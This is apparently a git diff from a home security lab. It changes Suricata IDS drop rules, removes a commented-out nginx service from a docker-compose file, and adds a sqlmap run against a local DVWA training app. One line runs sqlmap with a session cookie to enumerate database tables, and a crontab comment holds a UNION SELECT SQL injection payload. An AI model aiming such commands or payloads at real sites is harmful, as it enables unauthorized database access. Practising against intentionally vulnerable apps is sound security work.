asdf

docker/suricata/docker-compose.yml

@@ -1,17 +1,4 @@
 services:
-  # nginx:
-  #   image: nginx:latest
-  #   container_name: nginx
-  #   restart: always
-  #   ports:
-  #     - "3332:3332"
-  #   volumes:
-  #     - ./nginx/nginx.conf:/etc/nginx/nginx.conf:ro
-  #     - ./nginx/logs:/var/log/nginx
-  #   network_mode: "host"
-  #   extra_hosts:
-  #     - "host.docker.internal:host-gateway"
-
   suricata:
     image: jasonish/suricata
     container_name: suricata

docker/suricata/suricata/etc/rules/suricata.rules

@@ -1,5 +1,6 @@
 # test blocks
 #drop http any any -> any any (msg:"asdf attempt"; content:"asdf@gmail.com"; http_client_body; nocase; sid:1000007; rev:2;)
-#drop ip 192.168.0.71 any -> any any (msg:"asdfBlocking ALL traffic from 192.168.0.71"; sid:1000010; rev:1;)
 #drop http any any -> any any (msg:"dropping ALL shit"; sid:1000123; rev:1;)
-#drop http any any -> 192.168.0.69 80 (msg:"Blocked /health endpoint"; http.uri; content:"/health"; nocase; sid:1000008; rev:2;)
+
+drop http any any -> 192.168.0.69 3333 (msg:"Blocked /health endpoint"; http.uri; content:"/health"; nocase; sid:1000008; rev:2;)
+drop ip any any -> any 3333 (msg:"Blocking ALL traffic from 192.168.0.71"; sid:1000010; rev:1;)

sqlmap/crontab

@@ -3,4 +3,4 @@
 # runs the script on every system startup
 # starts the dvwa in the background
 # then runs sqlmap
-# log all outputs and errors
+# log all outputs and errorsSpoiler: ?id=a' UNION SELECT "text1","text2";-- -&Submit=Submit.

sqlmap/run.sh

@@ -0,0 +1 @@
+sqlmap -u "http://localhost:80/vulnerabilities/sqli/?id=234&Submit=Submit" --cookie="PHPSESSID=l38mpsp9ksla91tnvglti5jur6; security=low" --tables --batch